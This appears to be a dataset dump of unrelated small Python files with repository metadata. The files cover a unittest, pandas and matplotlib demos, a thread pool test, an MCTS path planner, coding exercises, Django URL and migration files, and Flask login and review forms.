class TestAddMethodToClass(unittest.TestCase):
    """
    Adding a method from outside works for user-defined classes but is
    refused for built-in types.
    """
    def test_add_method_to_class(self):
        """A method assigned onto a user-defined class is visible on existing instances."""
        class A:
            x = 'hello'
        a = A()
        A.get_x = lambda self: self.x
        self.assertEqual(a.get_x(), 'hello')

    def test_add_method_to_list(self):
        """
        It is impossible to add a method to a built-in type.
        """
        # assertRaises states the expectation directly, replacing the original
        # try/except/else bookkeeping with manual assertTrue(False) failures.
        with self.assertRaises(TypeError):
            list.hello = lambda self: f'hello from list'
| [
"shmakovpn@yandex.ru"
] | shmakovpn@yandex.ru |
c25275838589896ab6d41975281532489b4fc365 | e8ddc602f4904fd29aeca00b15bc6dfc56113a6f | /fillTest.py | 538807c89fd057b5557d88befd2d75d14230d353 | [] | no_license | Tycho-1/Computational_Investing | b7f00bab4fb7c9e8e79d7cb8c6474dcb2630dc77 | 923d4ecedc96845fae2aa5c364b0a858e5dafb55 | refs/heads/master | 2021-05-01T03:45:07.674418 | 2013-05-06T00:49:28 | 2013-05-06T00:49:28 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 301 | py | # -*- coding: utf-8 -*-
"""
Created on Sat Mar 30 20:49:15 2013
@author: Aleks
"""
import pandas as pd
from pandas import Series
# Python 2 demo script (print statements).
# Six temperature readings; index 2 holds 0 (a real value, not NaN).
atemps = Series([101.5, 98, 0,85,100,92])
print atemps
print ""
# drop() returns a NEW Series without the 4th reading (label 3).
sdtemps = atemps.drop(atemps.index[3])
print sdtemps
print ""
# NOTE(review): fillna() also returns a new Series -- the result is discarded
# here, so this call has no effect on `atemps` (which contains no NaN anyway).
atemps.fillna(method = 'ffill')
print atemps
| [
"aleksbreian@gmail.com"
] | aleksbreian@gmail.com |
1d96bf4813081a39a86e6bc6ee1c75adb9b66020 | 23904f58e3e9af5552647b1ff57bb2fc306a70a6 | /day002/day-2-2-exercise.py | 90320fff387bbc1b6a9fd4aee2c094d7df8088ae | [] | no_license | mukalaraja/python_bootcamp | bedd426abbefea2e4c9a594efb7c6a4d70eb6d3a | 976faaa712b849355ea8e0c6afc053744a6a923a | refs/heads/main | 2023-06-14T20:45:49.691677 | 2021-07-09T15:43:37 | 2021-07-09T15:43:37 | 362,876,406 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 213 | py | # 🚨 Don't change the code below 👇
# Read weight (kg) and height (m) as strings from stdin.
weight= input("enter your weight in kg: ")
height= input("enter your height in m: ")
# BMI = kg / m^2; weight is parsed as int, height as float.
bmi= int(weight) / float(height) **2
print(bmi)
# Truncate (not round) the BMI to a whole number.
bmi_as_int= int(bmi)
print(bmi_as_int)
| [
"mukalaraja@gmail.com"
] | mukalaraja@gmail.com |
0a444651a13ec88f37dcbfaebe2e1fda767e96c6 | 6c251444500af6639d9f54eddd46b160554e61fd | /matpy.py | 1fc9b354e940699972d3e465b2cd9bc53046a931 | [] | no_license | gabrielsotoo/python | ccb797a477cb897ad31ae6287e7baee8de786ba0 | ed4fb70a43c238f06b97c1990a077acce0832432 | refs/heads/master | 2021-05-08T00:08:31.282390 | 2017-12-14T17:52:28 | 2017-12-14T17:52:28 | 107,627,654 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 183 | py | #%%
#File to plot using matplotlib and numpy
import matplotlib.pyplot as plt
import matplotlib as mpl
# NOTE(review): the `mpl` alias is unused in this script.
import numpy as np
# 100 evenly spaced sample points on [0, 20].
x = np.linspace(0, 20, 100)
# Plot cos(x); plt.show() follows on the next line of the file.
plt.plot(x, np.cos(x))
plt.show() | [
"gabosoto04@gmail.com"
] | gabosoto04@gmail.com |
bb08f8e91a38e28c4e74bc8b31b06874b86d8605 | 2ba87ce6df8179d06599c08b9afaadaea0a6dfee | /ThreadPool/test.py | 8644a6a9b1d8193a039d7021d4e61ff4bd2b98bb | [] | no_license | github-zbp/operating-system | 1e85446a3748fe663eb064cf64d06f2644cde5ff | 5a55405c2059848abd46ab65de9581d246092675 | refs/heads/master | 2023-01-11T23:04:29.396614 | 2020-11-09T07:20:22 | 2020-11-09T07:20:22 | 264,598,823 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,125 | py | # coding=utf-8
# import sys,os
#
# print(os.path.dirname(os.path.abspath(__file__)))
# sys.path.append(os.path.dirname(os.path.abspath(__file__)))
# os.chdir(".")
from Task import Task
from ThreadPool import ThreadPool
from Task import AsyncTask,Task
# 测试有返回值的任务
def asyncTask():
    """Return the sum of 0..999 (= 499500); a sample task whose result is collected."""
    # sum() over the range replaces the manual accumulation loop.
    return sum(range(1000))
def commonTask():
    """Print the sum of 0..999; a sample task run purely for its console side effect."""
    total = 0
    value = 0
    while value < 1000:
        total += value
        value += 1
    print(total)
# Create a thread-pool instance.
pool = ThreadPool()
# Start every worker thread; with no tasks queued yet, all workers
# immediately block waiting for work.
pool.start()
# Queue 100000 tasks; the pool's workers pick them up and run them.
print("开始执行任务")
task_list = []
for i in range(100000):
    task = Task(commonTask)
    # task = AsyncTask(asyncTask)
    pool.put_task(task)
    task_list.append(task)
# 在此处可以进行一些主线程的逻辑处理,在主线程处理自己的逻辑的时候,线程池中的线程也在异步处理任务队列中的任务。
for task in task_list:
print(task.get_result()) | [
"wenzhangxiang@yeah.net"
] | wenzhangxiang@yeah.net |
7bd755a513ab33e0895934f2e894d6e4371e8e23 | 560e222464c11a74f74f5b6daf7e468d98f5baa7 | /build/cm_gazebo/catkin_generated/pkg.installspace.context.pc.py | 45611cfe294b22a5575e0a38f27af359d28718fe | [] | no_license | RichardYSun/MuscleLabROSWorkspace | 32a963e64b1d38ece8484c23d36d03fa2c077f24 | 8ccdf3e59ac882b7efd2aeb54547067782db9457 | refs/heads/master | 2022-11-30T16:20:45.596083 | 2020-08-04T15:10:14 | 2020-08-04T15:10:14 | 284,983,018 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 377 | py | # generated from catkin/cmake/template/pkg.context.pc.in
# Auto-generated catkin package context (values substituted by CMake at
# configure time) -- do not edit by hand.
CATKIN_PACKAGE_PREFIX = ""
PROJECT_PKG_CONFIG_INCLUDE_DIRS = "".split(';') if "" != "" else []  # empty substitution -> []
PROJECT_CATKIN_DEPENDS = "".replace(';', ' ')
PKG_CONFIG_LIBRARIES_WITH_PREFIX = "".split(';') if "" != "" else []
PROJECT_NAME = "cm_gazebo"
PROJECT_SPACE_DIR = "/home/musclelab/coolmuscle/install"
PROJECT_VERSION = "0.0.0"
| [
"richard-y-sun@hotmail.com"
] | richard-y-sun@hotmail.com |
6d960cfa702fcfa1af1655fd6c24d17162ab5c31 | ea1e06e8edebf814845c6545018e0e67825fc0db | /python_scripts/continuous_MCTS.py | 3cb8c0e62e53270c57c4f39e7489d6a4bb569d6b | [] | no_license | dabinkim-LGOM/informative-path-planning | 8db31704dfb73dceed9c3587391681293482895d | 15fa11b937716707934a057ec64cfebfafcc0121 | refs/heads/master | 2021-05-16T22:47:13.273663 | 2020-07-22T09:08:42 | 2020-07-22T09:08:42 | 250,501,078 | 0 | 0 | null | 2020-03-27T10:10:15 | 2020-03-27T10:10:13 | null | UTF-8 | Python | false | false | 6,558 | py | # !/usr/bin/python
'''
Based on the library of PLUMES, extend Monte Carlo Tree Search class to continuous-action case.
This library allows access to the Monte Carlo Tree Search class used in the PLUMES framework.
A MCTS allows for performing many forward simulation of multiple-chained actions in order to
select the single most promising action to take at some time t. We have presented a variation
of the MCTS by forward simulating within an incrementally updated GP belief world.
'''
import numpy as np
import scipy as sp
import math
import os
import GPy as GPy
import time
from itertools import chain
import pdb
import logging
logger = logging.getLogger('robot')
from aq_library import *
import copy
import random
from mcts_library import *
import continuous_traj as traj
class conti_action_MCTS(MCTS):
    '''
    Monte Carlo Tree Search variant extended toward continuous actions.

    Inherits the tree construction/rollout machinery from MCTS and adds a
    (currently stubbed) value-gradient step intended to refine sampled
    actions between rollouts.
    '''
    def __init__(self, time, computation_budget, belief, initial_pose, rollout_length, path_generator, aquisition_function, f_rew, T, aq_param = None, use_cost = False, tree_type = 'dpw'):
        # NOTE(review): the parameter `time` shadows the imported `time` module
        # inside this method, and the super() call passes literal defaults
        # (aq_param=None, use_cost=False, tree_type='dpw') instead of the
        # caller-supplied values -- confirm whether that is intentional.
        super(conti_action_MCTS, self).__init__(computation_budget, belief, initial_pose, rollout_length, path_generator, aquisition_function, f_rew, T, aq_param = None, use_cost = False, tree_type = 'dpw')
        self.t = time
    def simulate(self, t):
        '''Grow the search tree for one planning step and return the best action found.'''
        self.initialize_tree()
        i = 0 #iteration count
        # randomly sample the world for entropy search function
        if self.f_rew == 'mes' or self.f_rew == 'maxs-mes':
            self.max_val, self.max_locs, self.target = sample_max_vals(self.GP, t = t)
        time_start = time.time()
        # while we still have time to compute, generate the tree
        # (budget counted in rollouts here; the wall-clock check is commented out)
        while i < self.comp_budget:#time.time() - time_start < self.comp_budget:
            i += 1
            current_node = self.tree_policy()
            sequence = self.rollout_policy(current_node)
            reward, cost = self.get_reward(sequence)
            self.update_tree(reward, cost, sequence) #Backpropagation
            # Gradient-based action refinement (stub: gradient is always 0.0).
            value_grad = self.get_value_gradient()
            self.update_action(value_grad)
        time_end = time.time()
        print "Rollouts completed in", str(time_end - time_start) + "s",
        # get the best action to take with most promising futures, base best on whether to
        # consider cost
        best_sequence, best_val, all_vals = self.get_best_child()
        paths, dense_paths = self.path_generator.get_path_set(self.cp)
        #Document the information
        print "Number of rollouts:", i, "\t Size of tree:", len(self.tree)
        logger.info("Number of rollouts: {} \t Size of tree: {}".format(i, len(self.tree)))
        np.save('./figures/' + self.f_rew + '/tree_' + str(t) + '.npy', self.tree)
        return self.tree[best_sequence][0], self.tree[best_sequence][1], best_val, paths, all_vals, self.max_locs, self.max_val
    def update_action(self, value_grad):
        '''
        Based on the gradient value, update action and re-iterate generation of trajectory
        '''
        # NOTE(review): binds the method object without calling it (missing
        # parentheses) and the result is unused -- this hook is unimplemented.
        grad = self.get_value_gradient
        # self.tree
    def get_value_gradient(self):
        '''Placeholder: return the value gradient (always 0.0 for now).'''
        val_gradient = 0.0
        return val_gradient
if __name__ == "__main__":
print("Hello")
sample_step = 0.5
ranges = (0., 10., 0., 10.)
start = (0.25, 0.25, 0.0)
path_length = 1.5*175
coverage_path = [start]
across = 9.75
rise = 0.38
cp = start
waypoints = [cp]
l = 0
for i in range(0,51):
if i%2 == 0:
if cp[0] > ranges[1]/2:
cp = (cp[0]-across+0.25, cp[1], cp[2])
l += across
else:
cp = (cp[0]+across-0.25, cp[1], cp[2])
l += across
else:
cp = (cp[0], cp[1]+rise, cp[2])
l += rise
waypoints.append(cp)
x = [w[0] for w in waypoints]
y = [w[1] for w in waypoints]
samples = [start]
extra = 0
addit = 0
last = start
for i,w in enumerate(waypoints):
if i%4 == 0:
last = w[0]
while last+sample_step <= waypoints[i+1][0]:
samples.append((last+sample_step, w[1], w[2]))
last = samples[-1][0]
remainder = across-last
elif (i+1)%4 == 0:
last = waypoints[i-1][0]
while last-sample_step+(remainder) >= waypoints[i][0]:
samples.append((last-sample_step+(remainder), w[1], w[2]))
last = samples[-1][0]
remainder = across-last
xs = [s[0] for s in samples]
ys = [s[1] for s in samples]
reward_function = 'mes'
ranges = (0., 10., 0., 10.)
world = Environment(ranges = ranges, # x1min, x1max, x2min, x2max constraints
NUM_PTS = 20,
variance = 100.0,
lengthscale = 1.0,
visualize = True,
seed = 3)
evaluation = Evaluation(world = world,
reward_function = reward_function)
# Gather some prior observations to train the kernel (optional)
x1observe = np.linspace(ranges[0]+0.5, ranges[1]-0,5, 8)
x2observe = np.linspace(ranges[2]+0.5, ranges[3]-0.5, 8)
x1observe, x2observe = np.meshgrid(x1observe, x2observe, sparse = False, indexing = 'xy')
data = np.vstack([x1observe.ravel(), x2observe.ravel()]).T
observations = world.sample_value(data)
# Create the point robot
robot = Nonmyopic_Robot(sample_world = world.sample_value,
start_loc = (5.0, 5.0, 0.0),
extent = ranges,
kernel_file = None,
kernel_dataset = None,
prior_dataset = None,
#prior_dataset = (data, observations),
init_lengthscale = 1.0,
init_variance = 100.0,
noise = 0.0001,
path_generator = 'default',
frontier_size = 20,
horizon_length = 1.5,
turning_radius = 0.05,
sample_step = 0.5,
evaluation = evaluation,
f_rew = reward_function,
create_animation = True,
computation_budget = 5,
rollout_length = 3)
robot.planner(T = 20)
robot.visualize_world_model(screen = True)
robot.visualize_trajectory(screen = True)
robot.plot_information()
# const_MCTS = conti_action_MCTS(5.0)
# const_MCTS.initialize_tree()
| [
"dabin404@snu.ac.kr"
] | dabin404@snu.ac.kr |
44a9b117cfd8ad0e1c91c53496fdd1038c6f1973 | 5694af6d33f571d9e875df75743982d603ccf246 | /beginner/1094/1094.py | 033097c8d0d571e6eeaceef8e1005dfa8520bc42 | [
"MIT"
] | permissive | eliseuegewarth/uri-exercises | b0cf4b7a3eea6579e7734a000ac575f6eadf903f | b3edbd39492a9e42cb8731dc0c960917c503b075 | refs/heads/master | 2020-07-01T08:23:49.834989 | 2020-03-30T18:59:02 | 2020-03-30T18:59:02 | 201,106,860 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 568 | py |
n = int(input())
r, c, s, t = [0, 0, 0, 0]
for x in range(1,n+1):
ln = input().split()
if ln[1] == "R":
r = r + int(ln[0])
elif ln[1] == "C":
c = c + int(ln[0])
elif ln[1] == "S":
s = s + int(ln[0])
else:
pass
t = t + int(ln[0])
print("Total: {} cobaias".format(t))
print("Total de coelhos: {}".format(c))
print("Total de ratos: {}".format(r))
print("Total de sapos: {}".format(s))
print("Percentual de coelhos: {0:.2f} %".format(c*100/t))
print("Percentual de ratos: {0:.2f} %".format(r*100/t))
print("Percentual de sapos: {0:.2f} %".format(s*100/t))
| [
"eliseuegewarth@gmail.com"
] | eliseuegewarth@gmail.com |
185e376acffac2fbf4bac65598a834284256a095 | 7de3f254e6f0244bfd846c7e204fd2a23b55efeb | /corporate/urls.py | 84745890bc450a389885afb5703c5ea136bb039a | [
"Apache-2.0",
"LicenseRef-scancode-generic-cla",
"LicenseRef-scancode-free-unknown"
] | permissive | k0nsl/zulip | 8fac8c4cffd686b6158cb08e1a7ed1631c07d2a7 | 6e3426fe10b6aa7061892d30d16ffa009dd8cbb0 | refs/heads/master | 2020-04-01T21:26:24.725227 | 2015-10-20T18:28:03 | 2015-11-01T04:20:34 | 45,353,099 | 0 | 0 | Apache-2.0 | 2020-01-27T02:09:05 | 2015-11-01T18:55:26 | Python | UTF-8 | Python | false | false | 410 | py | from django.conf.urls import patterns, url
from django.views.generic import TemplateView, RedirectView
urlpatterns = patterns('',
# Zephyr/MIT
url(r'^zephyr/$', TemplateView.as_view(template_name='corporate/zephyr.html')),
url(r'^mit/$', TemplateView.as_view(template_name='corporate/mit.html')),
url(r'^zephyr-mirror/$', TemplateView.as_view(template_name='corporate/zephyr-mirror.html')),
)
| [
"steve@zulip.com"
] | steve@zulip.com |
d8c34f6cc1362c8495c6188ce80609455548c57e | 683fd357a898cf5ed9d8e30db99305b0e7bbf7e3 | /prepare_scripts/p2.py | 61795f1c8833972c2cb07da02108d82054dc0641 | [
"CC-BY-4.0",
"Apache-2.0"
] | permissive | shisashi/ruigomush | d7e734e6813adb47b30cc606dceb7358e3217b05 | 982a0d27b44c27cf61d91cb24c76cdbc4b540d7c | refs/heads/master | 2021-01-10T19:40:31.108315 | 2012-01-27T07:27:35 | 2012-01-27T07:27:35 | 2,413,547 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,720 | py | #! /usr/bin/env python
# -*- coding: utf-8 -*-
from xml.etree.cElementTree import ElementTree
import codecs
import sys
import re
#CODING = 'cp932'
#ERRORS = 'backslashreplace' # 'xmlcharrefreplace'
#FILENAME_SUFFIX = 'sj'
CODING = 'utf-8'
ERRORS = 'strict'
FILENAME_SUFFIX = 'u8'
class Synset(object):
def __init__(self, ssid, definition):
self.ssid = ssid
self.definition = definition
self.words = []
# "(数値)年)" を含むものは固有名詞
self.is_proper_noun = definition is not None and re.search(u'\\d年)', definition) is not None
def __repr__(self):
s = u'%s(%s)' % (self.ssid, u','.join(self.words))
return s.encode('utf-8')
def generate_graph(tree):
lexicon = tree.find('Lexicon')
# synsetの一覧を読み込む
synsets = {}
ignored = []
for ss in lexicon.getiterator('Synset'):
ssid = ss.attrib['id'][8:] # 'jpn-1.1-' を除く
de = ss.find('Definition')
if de is None:
# 定義文がない
definition = None
else:
definition = de.attrib['gloss']
synset = Synset(ssid, definition)
if synset.is_proper_noun:
# 固有名詞の類なので除外する
ignored.append(synset)
else:
synsets[ssid] = synset
# 単語の一覧を読み込み、定義にぶら下げる
# 単語の出現数を数える
word_counter = {}
for le in lexicon.getiterator('LexicalEntry'):
lemma = le.find('Lemma').attrib['writtenForm']
n = 0
for ss in le.getiterator('Sense'):
ssid = ss.attrib['synset'][8:] # 'jpn-1.1-' を除く
synset = synsets.get(ssid)
if synset is not None:
synset.words.append(lemma)
n += 1
word_counter[lemma] = word_counter.get(lemma, 0) + n
# 不要なsynsetを取り除く
# 必要なものを 単語 -> [synset] に変換
del_ssids = []
word_table = {}
for ssid in synsets:
synset = synsets[ssid]
num_words = len(synset.words)
if num_words == 0:
# 単語が含まれない
pass
elif synset.definition is None and num_words == 1:
# 定義文がなく、ぶら下がっている単語が1つ
pass
elif max(word_counter[word] for word in synset.words) == 1:
# 含まれる全ての単語がこの意味しか持っていない
pass
else:
# 削除対象外なので、単語 -> [synset] に追加
for word in synset.words:
word_table.setdefault(word, []).append(synset)
continue
# 上記の条件に該当したものを削除する
del_ssids.append(ssid)
# 削除対象を削除
for ssid in del_ssids:
del synsets[ssid]
# 1つの単語が複数のsynsetを持っているが、どのsynsetも1つの単語(この単語)しか持っていない
for word in word_table:
word_synsets = word_table[word]
if max(len(synset.words) for synset in word_synsets) == 1:
for synset in word_synsets:
del synsets[synset.ssid]
# リストに変換して戻す
return ((synsets[ssid] for ssid in synsets), ignored)
def write_ss(synset_list):
with codecs.open('ss.' + FILENAME_SUFFIX + '.csv', 'w', encoding=CODING, errors=ERRORS) as sscsv:
for synset in synset_list:
#sscsv.write(synset.ssid)
#sscsv.write(u'\t')
definition = synset.definition
if definition is None:
definition = u''
sscsv.write(definition)
sscsv.write(u'\t')
sscsv.write(u'\t'.join(synset.words))
sscsv.write(u'\n')
def write_ig(ignored_list):
with codecs.open('ig.' + FILENAME_SUFFIX + '.csv', 'w', encoding=CODING, errors=ERRORS) as igcsv:
for ig in ignored_list:
igcsv.write(ig.ssid)
igcsv.write(u'\t')
igcsv.write(ig.definition)
igcsv.write(u'\n')
def main(filename):
import time
def ptime(message):
print time.strftime('%Y-%m-%d %H:%M:%S'), message
ptime('parsing a xml...')
tree = ElementTree()
tree.parse(filename)
ptime('parsed.')
ptime('generating a graph...')
synset_list, ignored_list = generate_graph(tree)
ptime('generated.')
ptime('writeing ss.csv...')
write_ss(synset_list)
ptime('wrote.')
ptime('writeing ig.csv...')
write_ig(ignored_list)
ptime('wrote.')
if __name__ == '__main__':
#import psyco
#psyco.full()
main('jpn_wn_lmf.xml')
| [
"shisashi@gmail.com"
] | shisashi@gmail.com |
cc4fc21e5644b816307f3f355f00cde6b41b4d92 | ab4fd9eed607a25f214d830d12ebc6149b4a7bc4 | /Page1/Euler10.py | 32b10f6ab4ad059a6c4db9d0d8c05dbab99e0a34 | [] | no_license | lj8175/Euler | 422b31cef99b31030d91f5b49c92016e2a923d2f | 9a48771754fe4af964a5f8384eb65edde238620f | refs/heads/master | 2021-01-23T13:22:38.151411 | 2013-12-24T02:51:06 | 2013-12-24T02:51:06 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 658 | py | '''
Created on 2013-5-23
@author: lj8175
'''
import math
import time
def isPrime(x):
if x<=1 :return False
elif x%2 == 0: return False if x!=2 else True
elif x%3 == 0: return False if x!=3 else True
elif x%5 == 0: return False if x!=5 else True
elif x%7 == 0: return False if x!=7 else True
for i in range(11,int(math.sqrt(x)) + 1):
if x % i == 0:
return False
return True
if __name__ == '__main__':
begin = time.clock()
s = 0
for i in range(int(2e6)):
if isPrime(i):
s += i
#print i
print s
print time.clock() - begin
pass | [
"lj8175@gmail.com"
] | lj8175@gmail.com |
d44d220f05307a06e04c9b879cb6b91ea97e3d90 | 603a1ae4724e69ffd8cb2990b998b31a36e31e21 | /data_processor.py | fe8c2dfa7b517223f458bfee1837af3d230e4352 | [] | no_license | evan4C/FiberMeasure | 77cbcc687c66bd2a8b9320a18769bd4714ccf6ba | 3dc92f19dc0e54316ad1f40338c7ae6120b1f279 | refs/heads/main | 2023-03-05T12:21:27.633978 | 2021-02-11T00:17:53 | 2021-02-11T00:17:53 | 337,888,130 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 980 | py | import glob
import numpy as np
import csv
import tensorflow as tf
import config
def data_processor(data_dir):
    """Concatenate every '*000000.csv' in `data_dir` into one 'label.csv'.

    Each source file is loaded (skipping its header row), flattened, and
    truncated to its first 15 values, which become one row of the output.
    """
    output = data_dir + '/label.csv'
    with open(output, 'w', newline='') as f:
        writer = csv.writer(f)
        # Sort so the output row order is deterministic across filesystems.
        point_files = sorted(glob.glob(data_dir + '/*000000.csv'))
        # `point_file` instead of `file`, which shadowed a builtin name.
        for point_file in point_files:
            points = np.loadtxt(point_file, skiprows=1, delimiter=',')
            points = points.flatten()[:15]
            writer.writerow(points)
def preprocess_image(image, img_size):
    """Decode raw JPEG bytes to a single-channel tensor, resize to
    (img_size, img_size) and scale pixel values into [0, 1]."""
    image = tf.image.decode_jpeg(image, channels=1)
    image = tf.image.resize(image, [img_size, img_size])
    image /= 255.0  # normalize to [0,1] range
    return image
def load_and_preprocess_image(path):
    """Read the image file at `path` and return the preprocessed tensor.

    The target size comes from the global `config.img_size`.
    """
    image = tf.io.read_file(path)
    img_size = config.img_size
    return preprocess_image(image, img_size)
if __name__ == '__main__':
    # NOTE(review): data_dir is an empty placeholder, so the output path
    # becomes '/label.csv' (filesystem root) -- set a real directory before
    # running this module as a script.
    data_dir = ''
    data_processor(data_dir)
| [
"33539261+evan4C@users.noreply.github.com"
] | 33539261+evan4C@users.noreply.github.com |
7e91ac82b07430fcb05da9493ea7cb4f7d00155e | 48df53e66257df2a17ea71118d1374f06a54074d | /webapp(authority)/accounts/migrations/0008_auto_20200728_1341.py | fef0dd2ecec248780b7603029ac6a081930f85fe | [] | no_license | sih2020admin/4485_Team_TIAS | a6b30e3907b2d182c6ed9816c8d1ae15a1559705 | eade305410ee8cb9d0bf091bfec440c0463dbd2b | refs/heads/master | 2022-11-26T13:53:00.273846 | 2020-08-03T12:54:02 | 2020-08-03T12:54:02 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,961 | py | # Generated by Django 2.2 on 2020-07-28 08:11
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('accounts', '0007_userdetails_parentuser'),
]
operations = [
migrations.AlterField(
model_name='userdetails',
name='aadhar',
field=models.CharField(error_messages={1: 'Enter Valid Information'}, max_length=12, null=True, unique=True),
),
migrations.AlterField(
model_name='userdetails',
name='address',
field=models.CharField(error_messages={1: 'Enter Valid Information'}, max_length=255, null=True),
),
migrations.AlterField(
model_name='userdetails',
name='city',
field=models.CharField(error_messages={1: 'Enter Valid Information'}, max_length=72, null=True),
),
migrations.AlterField(
model_name='userdetails',
name='country',
field=models.CharField(error_messages={1: 'Enter Valid Information'}, max_length=72, null=True),
),
migrations.AlterField(
model_name='userdetails',
name='dlicense',
field=models.CharField(error_messages={1: 'Enter Valid Information'}, max_length=14, null=True, unique=True),
),
migrations.AlterField(
model_name='userdetails',
name='dob',
field=models.DateField(error_messages={1: 'Enter Valid Information'}, help_text='Enter in DD/MM/YYYY Format', null=True),
),
migrations.AlterField(
model_name='userdetails',
name='email',
field=models.EmailField(error_messages={1: 'Enter Valid Information'}, max_length=254, null=True),
),
migrations.AlterField(
model_name='userdetails',
name='firstname',
field=models.CharField(error_messages={1: 'Enter Valid Information'}, max_length=140, null=True),
),
migrations.AlterField(
model_name='userdetails',
name='gender',
field=models.CharField(error_messages={1: 'Enter Valid Information'}, max_length=7, null=True),
),
migrations.AlterField(
model_name='userdetails',
name='height',
field=models.IntegerField(error_messages={1: 'Enter Valid Information'}, null=True),
),
migrations.AlterField(
model_name='userdetails',
name='lastname',
field=models.CharField(error_messages={1: 'Enter Valid Information'}, max_length=140, null=True),
),
migrations.AlterField(
model_name='userdetails',
name='pancard',
field=models.CharField(error_messages={1: 'Enter Valid Information'}, max_length=10, null=True, unique=True),
),
migrations.AlterField(
model_name='userdetails',
name='passport',
field=models.CharField(error_messages={1: 'Enter Valid Information'}, max_length=14, null=True, unique=True),
),
migrations.AlterField(
model_name='userdetails',
name='placeOfBirth',
field=models.CharField(error_messages={1: 'Enter Valid Information'}, max_length=140, null=True),
),
migrations.AlterField(
model_name='userdetails',
name='prev_records',
field=models.CharField(max_length=1000, null=True),
),
migrations.AlterField(
model_name='userdetails',
name='unique_feature',
field=models.TextField(error_messages={1: 'Enter Valid Information'}, max_length=255, null=True),
),
migrations.AlterField(
model_name='userdetails',
name='zipcode',
field=models.CharField(error_messages={1: 'Enter Valid Information'}, max_length=10, null=True),
),
]
| [
"raj.parab99@yahoo"
] | raj.parab99@yahoo |
112b1df405c6303a6b7848686721b023e19e0df3 | 042d77509eab03b1c3099635ed046ccd4a1e341c | /Player.py | c58b5d850d16c5f1c42c3eb1ffc2c18754e7db0d | [] | no_license | thezerothcat/catspygame | cc81d12bc80be3506478b5032658b27fe25c25be | 171b2d02a9917672823270bc307166cf1068312c | refs/heads/master | 2021-03-16T09:42:53.751211 | 2017-07-11T05:44:05 | 2017-07-11T05:44:05 | 4,227,046 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,003 | py | import CellObject
import Stats
import Characters
class Player:
    """Top-level player state: a roster of characters plus money/progress counters."""

    def __init__(self, name = 'Hero'):
        # Start with a single default character renamed to the requested name.
        self.characters = [ Characters.Character('Hero') ]
        self.characters[0].name = name
        self.money = 0
        self.progress = 0
        self.purchases = 0

    def send(self):
        """Serialize the player (and each character) into a plain dict and return it."""
        out = []
        for character in self.characters:
            out.append(character.send())
        data = {'money':self.money, 'purchases':self.purchases, 'progress':self.progress, 'characters':out}
        # Bug fix: the dict was built but never returned, so callers always got None.
        return data

    def receive(self, data):
        """Restore player state from a dict produced by send()."""
        guys = []
        for character_data in data['characters']:
            guy = Characters.Character('Hero')
            guys.append(guy.receive(character_data))
        # NOTE(review): `guys` is built but never stored -- presumably it should
        # replace self.characters once Character.receive() is confirmed to
        # return the populated character.  Left unchanged to avoid guessing.
        self.money = data['money']
        self.progress = data['progress']
        self.purchases = data['purchases']
# will allow scene review later
# self.scenes = []
# self.human = human
# 'Apple', 'Apple', 'Apple', 'Apple', 'Bomb', 'Apple', 'Apple', 'Bomb', 'Apple', 'Bomb'
| [
"thezerothcat@gmail.com"
] | thezerothcat@gmail.com |
ba23c62100db116efd7324951a64756cd5c57c2b | 0e02d2c70ccdd94f3272baa7fad926e82edd3fa1 | /filmFinder/forms.py | c1fbe6ad4f5b1dd463c4a09156e47f005de021ce | [] | no_license | Kevin-zry/COMP9900-Project | 4e673c2217785c278f10fce4043b5ace84ac2a60 | 87b9d6b796ae596c6bf60f9a1b2a0a0a53854f10 | refs/heads/master | 2023-02-25T09:18:04.238167 | 2020-11-18T10:53:31 | 2020-11-18T10:53:31 | 335,922,476 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,801 | py | from flask_wtf import FlaskForm
from flask_wtf.file import FileField, FileAllowed
from flask_login import current_user
from wtforms import StringField, PasswordField, SubmitField, BooleanField
from wtforms.validators import DataRequired, Length, Email, EqualTo, ValidationError
from wtforms import TextAreaField, IntegerField
from wtforms.validators import NumberRange
from filmFinder.models import USERPROFILES
class RegistrationForm(FlaskForm):
username = StringField('Username', validators=[
DataRequired(), Length(min=2, max=20)])
email = StringField('Email', validators=[DataRequired(), Email()])
password = PasswordField('Password', validators=[DataRequired()])
confirm_password = PasswordField('Confirm Password', validators=[
DataRequired(), EqualTo('password')])
submit = SubmitField('Sign Up')
def validate_username(self, username):
if USERPROFILES.query.filter_by(username=username.data).count() > 0:
raise ValidationError(
'This username is taken. Please choose a different one.')
def validate_email(self, email):
if USERPROFILES.query.filter_by(email=email.data).count() > 0:
raise ValidationError(
'This email is registered. Please choose a different one.')
class LoginForm(FlaskForm):
email = StringField('Email', validators=[DataRequired(), Email()])
password = PasswordField('Password', validators=[DataRequired()])
remember = BooleanField('Remember Me')
submit = SubmitField('Login')
class UpdateAccountForm(FlaskForm):
username = StringField('Username',
validators=[DataRequired(), Length(min=2, max=20)])
email = StringField('Email',
validators=[DataRequired(), Email()])
picture = FileField('Update Profile Picture', validators=[
FileAllowed(['jpg', 'png'])])
submit = SubmitField('Update')
def validate_username(self, username):
if username.data != current_user.username:
user = USERPROFILES.query.filter_by(username=username.data).first()
if user:
raise ValidationError(
'That username is taken. Please choose a different one.')
def validate_email(self, email):
if email.data != current_user.email:
user = USERPROFILES.query.filter_by(email=email.data).first()
if user:
raise ValidationError(
'That email is taken. Please choose a different one.')
class ReviewForm(FlaskForm):
rating = IntegerField('Rating', validators=[NumberRange(min=1, max=5)])
review = TextAreaField('Review', validators=[DataRequired()])
submit = SubmitField('Save')
| [
"53029382+zjx210000@users.noreply.github.com"
] | 53029382+zjx210000@users.noreply.github.com |
